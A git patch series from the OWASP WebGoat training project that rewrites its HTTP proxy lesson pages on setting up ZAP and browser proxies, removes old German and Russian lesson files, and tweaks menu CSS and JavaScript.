From 1b2f54accc4a48ccc1afe35a06db2971b88be42c Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Tue, 31 Jan 2017 11:38:57 -0500
Subject: [PATCH 01/10] #319 updated content for proxy

---
 .../plugin/HttpProxies/html/HttpProxies.html  |  9 ++++-
 .../lessonPlans/de/HttpBasics.html            | 29 ----------------
 .../en/HttpBasics_ProxyIntro0.adoc            | 20 +++++++++++
 .../en/HttpBasics_ProxyIntro1.adoc            |  7 ++--
 .../en/HttpBasics_ProxyIntro2.adoc            | 18 +++++++---
 .../lessonPlans/ru/HttpBasics.html            | 33 -------------------
 .../en/HttpBasics_solution.adoc               |  5 ---
 .../lessonSolutions/html/HttpBasics.html      | 14 --------
 8 files changed, 43 insertions(+), 92 deletions(-)
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/de/HttpBasics.html
 create mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro0.adoc
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/ru/HttpBasics.html
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/en/HttpBasics_solution.adoc
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/html/HttpBasics.html

diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/html/HttpProxies.html b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/html/HttpProxies.html
index 7af1444ae..59113e121 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/html/HttpProxies.html
+++ b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/html/HttpProxies.html
@@ -2,7 +2,14 @@
 
 <html xmlns:th="http://www.thymeleaf.org">
 
-	<div class="lesson-page-wrapper">
+    <div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+        <!-- include content here. Content will be presented via asciidocs files,
+        which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+        <div class="adoc-content" th:replace="doc:HttpBasics_ProxyIntro0.adoc"></div>
+    </div>
+
+    <div class="lesson-page-wrapper">
 		<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
 		<!-- include content here. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/de/HttpBasics.html b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/de/HttpBasics.html
deleted file mode 100644
index a41ca8309..000000000
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/de/HttpBasics.html
+++ /dev/null
@@ -1,29 +0,0 @@
-<div align="Center"> 
-<p><b>Lehrplan:</b> Http Basics </p>
- </div>
- 
-<p><b>Lehrinhalt:</b> </p>
- Diese Lektion stellt die Verst&auml;ndnis-Grundlagen f&uuml;r den Datentransport zwischen Browser und Webapplikation dar.<br>
-<div align="Left"> 
-<p>
-<b>So funktioniert HTTP:</b>
-</p>
-Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem K�rper.
-Der Client initiiert eine Transaktion wie folgt:<br>
-<br>
- Der Client kontaktiert den Server und sendet eine Dokumentenanfrage<br>
-</div>
-  <br>
-<ul>GET /index.html?param=value HTTP/1.0</ul>
- Als n&auml;chstes sendet der Client optionale Kopfzeilen (Header) um den Server &uuml;ber die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.<br>
- <br>
-<ul>User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*</ul>
-Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet.
-<br>
-<p><b>Grunds&auml;tzliche(s) Ziel(e):</b> </p>
-<!-- Start Instructions -->
-Geben Sie Ihren Namen in das Eingabefeld ein und dr�cken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zur�ckschicken. Dies stellt eine vollst&auml;ndige HTTP Transaktion dar!
-<br/><br/>
-Sie sollten mit der Benutzung von WebGoat vertraut werden. Es sollten die Kn�pfe f&uuml;r Hinweise (Hints), f&uuml;r das Anzeigen von Parametern(Parameters) oder Cookies und f&uuml;r das Anzeigen von Java-Quellcode ausprobiert werden.
-Au�erdem, k&ouml;nnen Sie hier WebScarab gut ausprobieren. 
-<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro0.adoc b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro0.adoc
new file mode 100644
index 000000000..6344750d7
--- /dev/null
+++ b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro0.adoc
@@ -0,0 +1,20 @@
+
+== HTTP Proxy Overview
+
+Many times proxies are used as a way of accessing otehrwise blocked content.  A user might connect to server A, which relays content from server B
+ ... Because Server B is blocked wihtin the user's network. That's not the use case we will be dealing with here, but the concept is the same.
+HTTP Proxies receive requesets from a client and relay them. They also typically record them. They act as a man-in-the-middle (keep that in mind if you decide to
+use a proxy server to connect to some other system that is otherwise blocked). We won't get into HTTP vs HTTPS just yet, but that's an important topic in
+relationship to proxies.
+
+=== Proxy Capabilities
+
+Proxies sit between your client and the server the client is talking to. You can record and analyze the requests & responses.  You can also use the proxy to
+modify (tamper) the requests and responses.  Proxies also have automated or semi-automated functions that allow  you to gain efficiency in testing and
+analyzing the security of a website.
+
+=== Other Uses for Proxies
+
+ZAP specifically can also be used in the development process in a CI/CD, DevOps or otherwise automated build/test environment.  This lesson does
+not currently have any details on that, but it is worth mentioning. There are a number of examples on the internet of it being integrated into a
+CI/CD with Jenkins, maven or other build processes.
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro1.adoc b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro1.adoc
index f61485bd3..7502cf15b 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro1.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro1.adoc
@@ -1,9 +1,7 @@
-= HTTP Basics : Proxy
- 
+
 == HTTP Proxy Setup
 
-HTTP Proxies are tools that allow an attacker, developer or researcher to act as a man-in-the-middle on requests and responses. Since this is an
-OWASP project, we'll be using ZAP. If you are comfortable using another proxy (e.g. Burp), you can skip this. Otherwise,
+Since this is an OWASP project, we'll be using ZAP. If you are comfortable using another proxy (e.g. Burp), you can skip this. Otherwise,
 this will show you how to set up ZAP to act as a proxy on your localhost.
 
 === Setting up ZAP
@@ -27,4 +25,3 @@ image::plugin_lessons/plugin/HttpProxies/images/zap-start.png[ZAP Start,548,256,
 . Click OK
 
 image::plugin_lessons/plugin/HttpProxies/images/zap-local-proxy.png[ZAP local proxy,800,648,style="lesson-image"]
-
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro2.adoc b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro2.adoc
index cf200141d..a0f127e69 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro2.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro2.adoc
@@ -1,11 +1,9 @@
 == HTTP Proxy Setup: The Browser
 
-=== Point Browser at Proxy
-
 There are many plugins to manage this, but this will show you how to do this manually in Firefox and Chrome.
 This will send all of your traffic to the proxy. Since we haven't set up a trusted cert. yet, that may cause issues with any https requests. More on that in a bit though. Let's stick to basics for now:
 
-==== Firefox Proxy Config
+=== Firefox Proxy Config
 
 . Go to your Firefox Preferences (Mac, Linux) or Options (Windows) from the menu.
 . Select _Advanced_ on the left
@@ -18,7 +16,7 @@ This will send all of your traffic to the proxy. Since we haven't set up a trust
 
 image::plugin_lessons/plugin/HttpProxies/images/firefox-proxy-config.png[Firefox Proxy Config,510,634,style="lesson-image"]
 
-==== Chrome Proxy Config
+=== Chrome Proxy Config
 
 . Bring up Chrome's settings form the menu
 . In the _Search settings_ box type in *proxy* and hit Enter/Return. This should bring up the Network heading with a _Change proxy settings_ button.
@@ -28,4 +26,14 @@ image::plugin_lessons/plugin/HttpProxies/images/firefox-proxy-config.png[Firefox
 . Input 127..0.0.1 in the first box under _Web Proxy Server_ and your port # (8090 is what used earlier) in the second box (to the right)
 . You may also want to clear the _Bypass proxy settings for these Hosts & Domains_ text input at the bottom, but shouldn't need to
 
-image::plugin_lessons/plugin/HttpProxies/images/chrome-manual-proxy.png[Chrome Proxy Config,700,447,style="lesson-image"]
\ No newline at end of file
+image::plugin_lessons/plugin/HttpProxies/images/chrome-manual-proxy.png[Chrome Proxy Config,700,447,style="lesson-image"]
+
+=== Other Proxy Configuration Options
+
+If you don't want to manage the proxy manually, there are extensions or plugins that can help you to do so without digging through as much config,
+or based on URL patterns. Examples include:
+
+* FoxyProxy for Firefox
+* Proxy Switcher for Firefox
+* Toggle Proxy for Firefox
+* Still looking for suggestions for Chrome ...
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/ru/HttpBasics.html b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/ru/HttpBasics.html
deleted file mode 100644
index ec21ec7ed..000000000
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/ru/HttpBasics.html
+++ /dev/null
@@ -1,33 +0,0 @@
-<div align="Center"> 
-<p><b>Название урока:</b> Основы Http </p>
- </div>
- 
-<p><b>Тема изучения:</b> </p>
-В данном уроке представлены основы необходимые для понимания процесса передачи данных между браузером и веб-приложением.<br>
-<div align="Left"> 
-<p>
-<b>Как работает HTTP:</b>
-</p>
-Все обращения по протоколу HTTP имеют один основной формат. Кажный запрос клиента или ответ сервера состоит из трёх частей:
-строка запроса или ответа, заголовок и тело. Клиент начинает предачу данных следующим образом: <br>
-<br>
- Он соединяется с сервером и отправляет запрос для получения документа <br>
-</div>
-  <br>
-<ul>GET /index.html?param=value HTTP/1.0</ul>
-Далее он шлёт различную информацию в разделе заголовка чтоб уведомить сервер о своей конфигурации и возможностях
-(например какие кодировки и типы документов поддерживаются клиентом).<br>
- <br>
-<ul>User-Agent: Mozilla/4.06<br />Accept: image/gif,image/jpeg, */*</ul>
-После отправки запроса и заголовков клиент может отправить дополнительные данные. Они в большинстве случаев
-предназначаются для CGI-программ использующих метод POST для принятия информации.<br>
-<p><b>Основные цели и задачи:</b> </p>
-<!-- Start Instructions -->
-Введите ваше имя в поле расположенное ниже и нажмите "Вперёд!" для отправки формы. Сервер примет ваш запрос, выстроит
-полученную строку в обратном порядке и выведет результат на экран. Данный пример иллюстрирует основы обработки данных
-полученных из HTTP-запроса.
-<br/><br/>
-Пользователю необходимо ознакомится с использованием функций WebGoat, таких как просмотр подсказок, отображение параметров HTTP-запроса, 
-отображение Cookies и исходных кодов Java. Первое время, в качестве практики, для просмотра параметров и Cookies
-запросов вы можете использовать WebScarab.
-<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/en/HttpBasics_solution.adoc b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/en/HttpBasics_solution.adoc
deleted file mode 100644
index a6293919c..000000000
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/en/HttpBasics_solution.adoc
+++ /dev/null
@@ -1,5 +0,0 @@
-= HTTP Basics 
- 
-== Solution 
-
-Solution goes here
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/html/HttpBasics.html b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/html/HttpBasics.html
deleted file mode 100644
index 42219764e..000000000
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/html/HttpBasics.html
+++ /dev/null
@@ -1,14 +0,0 @@
-<!DOCTYPE html>
-
-<html xmlns:th="http://www.thymeleaf.org">
-
-
-
-	<div class="lesson-page-wrapper">
-		<!-- reuse this block for each 'page' of content -->
-		<!-- include content here ... will be first page/tab  multiple -->
-		<div class="adoc-content" th:replace="doc:HttpBasics_solution.adoc"></div>
-	</div>
-
-
-</html>
\ No newline at end of file

From 675c506683ec1c63c7bb53a5acc91a336193d805 Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Tue, 31 Jan 2017 14:47:35 -0500
Subject: [PATCH 02/10] cleaning up, fixing selected lesson class/es

---
 .../src/main/resources/static/css/main.css    | 27 ++++++++++++-------
 .../static/js/goatApp/view/MenuView.js        |  5 ++--
 2 files changed, 21 insertions(+), 11 deletions(-)

diff --git a/webgoat-container/src/main/resources/static/css/main.css b/webgoat-container/src/main/resources/static/css/main.css
index 526bcb2fc..d9e22453b 100644
--- a/webgoat-container/src/main/resources/static/css/main.css
+++ b/webgoat-container/src/main/resources/static/css/main.css
@@ -14,7 +14,7 @@ a:link,
 a:visited {
   text-decoration: none;
   outline: none;
-  color: #e84c3d;
+  /* color: #e84c3d; */
 }
 a:hover,
 a:active {
@@ -839,12 +839,6 @@ cookie-container {
   overflow-y:scroll auto;
   overflow-x:hidden;
 }
-
-#sidebar {
-  /*background-color:#333;*/
-  background-color:blue;
-}
-
   
 .sidebar-toggle {
   margin-left: -240px;
@@ -876,6 +870,7 @@ cookie-container {
   -ms-transition: all 200ms ease-in;
   transition: all 200ms ease-in;
 }
+
 #menu-container ul li a span {
   display: inline-block;
 }
@@ -897,6 +892,15 @@ cookie-container {
   margin-left:8px;
 }
 
+#menu-container ul ul li.selected a {
+    color:#e84c3d
+}
+
+#menu-container ul ul li.selected a:hover {
+    color:#ddd
+}
+
+
 #menu-container ul li a i {
   width: 20px;
 }
@@ -914,9 +918,11 @@ cookie-container {
   display: block;
 }
 
+#menu-container ul li:hover,
 #menu-container ul li a:hover,
 #menu-container ul li.active > a {
-  color: #e84c3d;
+  background-color: #e84c3d;
+  color:#ddd;
 }
 
 #menu-container ul span.lesson-complete {
@@ -927,9 +933,11 @@ cookie-container {
     display:inline-block;
 }
 
+/*
 #menu-container ul li.selected, #menu-container li a.selected {
-    background-color: ##aaa;
+    background-color: #aaa;
 }
+*/
 
 #menu-container ul li.stage {
   padding-left:3px;
@@ -937,6 +945,7 @@ cookie-container {
 
 #menu-container li.selected, #menu-container a.selected {
   color:#fff;
+  /* background-color:#000; */
   font-weight:550;
 }
 
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js b/webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js
index 3dd2322e9..d71bf8c3e 100644
--- a/webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js
+++ b/webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js
@@ -108,14 +108,15 @@ define(['jquery',
 		},
 
 		onLessonClick: function (elementId) {
-			$('#'+this.curLessonLinkId).removeClass('selected');
+			$('#'+this.curLessonLinkId).removeClass('selected').parent().removeClass('selected');
 			//update
-			$('#'+elementId).addClass('selected');
+			$('#'+elementId).addClass('selected').parent().addClass('selected');
 			this.curLessonLinkId = elementId;
 		},
 
 		expandCategory: function (id) {
 			if (id) {
+			    //this.selectedCategory = id;
 				this.accordionMenu(id);
 			}
 		},

From 4d2edfa146cb7361a7be73a12f02162f8b8452bb Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Tue, 31 Jan 2017 11:38:57 -0500
Subject: [PATCH 03/10] #319 updated content for proxy

---
 .../plugin/HttpProxies/html/HttpProxies.html  |  9 ++++-
 .../lessonPlans/de/HttpBasics.html            | 29 ----------------
 .../en/HttpBasics_ProxyIntro0.adoc            | 20 +++++++++++
 .../en/HttpBasics_ProxyIntro1.adoc            |  7 ++--
 .../en/HttpBasics_ProxyIntro2.adoc            | 18 +++++++---
 .../lessonPlans/ru/HttpBasics.html            | 33 -------------------
 .../en/HttpBasics_solution.adoc               |  5 ---
 .../lessonSolutions/html/HttpBasics.html      | 14 --------
 8 files changed, 43 insertions(+), 92 deletions(-)
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/de/HttpBasics.html
 create mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro0.adoc
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/ru/HttpBasics.html
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/en/HttpBasics_solution.adoc
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/html/HttpBasics.html

diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/html/HttpProxies.html b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/html/HttpProxies.html
index 7af1444ae..59113e121 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/html/HttpProxies.html
+++ b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/html/HttpProxies.html
@@ -2,7 +2,14 @@
 
 <html xmlns:th="http://www.thymeleaf.org">
 
-	<div class="lesson-page-wrapper">
+    <div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+        <!-- include content here. Content will be presented via asciidocs files,
+        which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+        <div class="adoc-content" th:replace="doc:HttpBasics_ProxyIntro0.adoc"></div>
+    </div>
+
+    <div class="lesson-page-wrapper">
 		<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
 		<!-- include content here. Content will be presented via asciidocs files,
         which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/de/HttpBasics.html b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/de/HttpBasics.html
deleted file mode 100644
index a41ca8309..000000000
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/de/HttpBasics.html
+++ /dev/null
@@ -1,29 +0,0 @@
-<div align="Center"> 
-<p><b>Lehrplan:</b> Http Basics </p>
- </div>
- 
-<p><b>Lehrinhalt:</b> </p>
- Diese Lektion stellt die Verst&auml;ndnis-Grundlagen f&uuml;r den Datentransport zwischen Browser und Webapplikation dar.<br>
-<div align="Left"> 
-<p>
-<b>So funktioniert HTTP:</b>
-</p>
-Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem K�rper.
-Der Client initiiert eine Transaktion wie folgt:<br>
-<br>
- Der Client kontaktiert den Server und sendet eine Dokumentenanfrage<br>
-</div>
-  <br>
-<ul>GET /index.html?param=value HTTP/1.0</ul>
- Als n&auml;chstes sendet der Client optionale Kopfzeilen (Header) um den Server &uuml;ber die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.<br>
- <br>
-<ul>User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*</ul>
-Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet.
-<br>
-<p><b>Grunds&auml;tzliche(s) Ziel(e):</b> </p>
-<!-- Start Instructions -->
-Geben Sie Ihren Namen in das Eingabefeld ein und dr�cken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zur�ckschicken. Dies stellt eine vollst&auml;ndige HTTP Transaktion dar!
-<br/><br/>
-Sie sollten mit der Benutzung von WebGoat vertraut werden. Es sollten die Kn�pfe f&uuml;r Hinweise (Hints), f&uuml;r das Anzeigen von Parametern(Parameters) oder Cookies und f&uuml;r das Anzeigen von Java-Quellcode ausprobiert werden.
-Au�erdem, k&ouml;nnen Sie hier WebScarab gut ausprobieren. 
-<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro0.adoc b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro0.adoc
new file mode 100644
index 000000000..6344750d7
--- /dev/null
+++ b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro0.adoc
@@ -0,0 +1,20 @@
+
+== HTTP Proxy Overview
+
+Many times proxies are used as a way of accessing otehrwise blocked content.  A user might connect to server A, which relays content from server B
+ ... Because Server B is blocked wihtin the user's network. That's not the use case we will be dealing with here, but the concept is the same.
+HTTP Proxies receive requesets from a client and relay them. They also typically record them. They act as a man-in-the-middle (keep that in mind if you decide to
+use a proxy server to connect to some other system that is otherwise blocked). We won't get into HTTP vs HTTPS just yet, but that's an important topic in
+relationship to proxies.
+
+=== Proxy Capabilities
+
+Proxies sit between your client and the server the client is talking to. You can record and analyze the requests & responses.  You can also use the proxy to
+modify (tamper) the requests and responses.  Proxies also have automated or semi-automated functions that allow  you to gain efficiency in testing and
+analyzing the security of a website.
+
+=== Other Uses for Proxies
+
+ZAP specifically can also be used in the development process in a CI/CD, DevOps or otherwise automated build/test environment.  This lesson does
+not currently have any details on that, but it is worth mentioning. There are a number of examples on the internet of it being integrated into a
+CI/CD with Jenkins, maven or other build processes.
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro1.adoc b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro1.adoc
index f61485bd3..7502cf15b 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro1.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro1.adoc
@@ -1,9 +1,7 @@
-= HTTP Basics : Proxy
- 
+
 == HTTP Proxy Setup
 
-HTTP Proxies are tools that allow an attacker, developer or researcher to act as a man-in-the-middle on requests and responses. Since this is an
-OWASP project, we'll be using ZAP. If you are comfortable using another proxy (e.g. Burp), you can skip this. Otherwise,
+Since this is an OWASP project, we'll be using ZAP. If you are comfortable using another proxy (e.g. Burp), you can skip this. Otherwise,
 this will show you how to set up ZAP to act as a proxy on your localhost.
 
 === Setting up ZAP
@@ -27,4 +25,3 @@ image::plugin_lessons/plugin/HttpProxies/images/zap-start.png[ZAP Start,548,256,
 . Click OK
 
 image::plugin_lessons/plugin/HttpProxies/images/zap-local-proxy.png[ZAP local proxy,800,648,style="lesson-image"]
-
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro2.adoc b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro2.adoc
index cf200141d..a0f127e69 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro2.adoc
+++ b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/en/HttpBasics_ProxyIntro2.adoc
@@ -1,11 +1,9 @@
 == HTTP Proxy Setup: The Browser
 
-=== Point Browser at Proxy
-
 There are many plugins to manage this, but this will show you how to do this manually in Firefox and Chrome.
 This will send all of your traffic to the proxy. Since we haven't set up a trusted cert. yet, that may cause issues with any https requests. More on that in a bit though. Let's stick to basics for now:
 
-==== Firefox Proxy Config
+=== Firefox Proxy Config
 
 . Go to your Firefox Preferences (Mac, Linux) or Options (Windows) from the menu.
 . Select _Advanced_ on the left
@@ -18,7 +16,7 @@ This will send all of your traffic to the proxy. Since we haven't set up a trust
 
 image::plugin_lessons/plugin/HttpProxies/images/firefox-proxy-config.png[Firefox Proxy Config,510,634,style="lesson-image"]
 
-==== Chrome Proxy Config
+=== Chrome Proxy Config
 
 . Bring up Chrome's settings form the menu
 . In the _Search settings_ box type in *proxy* and hit Enter/Return. This should bring up the Network heading with a _Change proxy settings_ button.
@@ -28,4 +26,14 @@ image::plugin_lessons/plugin/HttpProxies/images/firefox-proxy-config.png[Firefox
 . Input 127..0.0.1 in the first box under _Web Proxy Server_ and your port # (8090 is what used earlier) in the second box (to the right)
 . You may also want to clear the _Bypass proxy settings for these Hosts & Domains_ text input at the bottom, but shouldn't need to
 
-image::plugin_lessons/plugin/HttpProxies/images/chrome-manual-proxy.png[Chrome Proxy Config,700,447,style="lesson-image"]
\ No newline at end of file
+image::plugin_lessons/plugin/HttpProxies/images/chrome-manual-proxy.png[Chrome Proxy Config,700,447,style="lesson-image"]
+
+=== Other Proxy Configuration Options
+
+If you don't want to manage the proxy manually, there are extensions or plugins that can help you to do so without digging through as much config,
+or based on URL patterns. Examples include:
+
+* FoxyProxy for Firefox
+* Proxy Switcher for Firefox
+* Toggle Proxy for Firefox
+* Still looking for suggestions for Chrome ...
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/ru/HttpBasics.html b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/ru/HttpBasics.html
deleted file mode 100644
index ec21ec7ed..000000000
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonPlans/ru/HttpBasics.html
+++ /dev/null
@@ -1,33 +0,0 @@
-<div align="Center"> 
-<p><b>Название урока:</b> Основы Http </p>
- </div>
- 
-<p><b>Тема изучения:</b> </p>
-В данном уроке представлены основы необходимые для понимания процесса передачи данных между браузером и веб-приложением.<br>
-<div align="Left"> 
-<p>
-<b>Как работает HTTP:</b>
-</p>
-Все обращения по протоколу HTTP имеют один основной формат. Кажный запрос клиента или ответ сервера состоит из трёх частей:
-строка запроса или ответа, заголовок и тело. Клиент начинает предачу данных следующим образом: <br>
-<br>
- Он соединяется с сервером и отправляет запрос для получения документа <br>
-</div>
-  <br>
-<ul>GET /index.html?param=value HTTP/1.0</ul>
-Далее он шлёт различную информацию в разделе заголовка чтоб уведомить сервер о своей конфигурации и возможностях
-(например какие кодировки и типы документов поддерживаются клиентом).<br>
- <br>
-<ul>User-Agent: Mozilla/4.06<br />Accept: image/gif,image/jpeg, */*</ul>
-После отправки запроса и заголовков клиент может отправить дополнительные данные. Они в большинстве случаев
-предназначаются для CGI-программ использующих метод POST для принятия информации.<br>
-<p><b>Основные цели и задачи:</b> </p>
-<!-- Start Instructions -->
-Введите ваше имя в поле расположенное ниже и нажмите "Вперёд!" для отправки формы. Сервер примет ваш запрос, выстроит
-полученную строку в обратном порядке и выведет результат на экран. Данный пример иллюстрирует основы обработки данных
-полученных из HTTP-запроса.
-<br/><br/>
-Пользователю необходимо ознакомится с использованием функций WebGoat, таких как просмотр подсказок, отображение параметров HTTP-запроса, 
-отображение Cookies и исходных кодов Java. Первое время, в качестве практики, для просмотра параметров и Cookies
-запросов вы можете использовать WebScarab.
-<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/en/HttpBasics_solution.adoc b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/en/HttpBasics_solution.adoc
deleted file mode 100644
index a6293919c..000000000
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/en/HttpBasics_solution.adoc
+++ /dev/null
@@ -1,5 +0,0 @@
-= HTTP Basics 
- 
-== Solution 
-
-Solution goes here
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/html/HttpBasics.html b/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/html/HttpBasics.html
deleted file mode 100644
index 42219764e..000000000
--- a/webgoat-lessons/http-proxies/src/main/resources/plugin/HttpProxies/lessonSolutions/html/HttpBasics.html
+++ /dev/null
@@ -1,14 +0,0 @@
-<!DOCTYPE html>
-
-<html xmlns:th="http://www.thymeleaf.org">
-
-
-
-	<div class="lesson-page-wrapper">
-		<!-- reuse this block for each 'page' of content -->
-		<!-- include content here ... will be first page/tab  multiple -->
-		<div class="adoc-content" th:replace="doc:HttpBasics_solution.adoc"></div>
-	</div>
-
-
-</html>
\ No newline at end of file

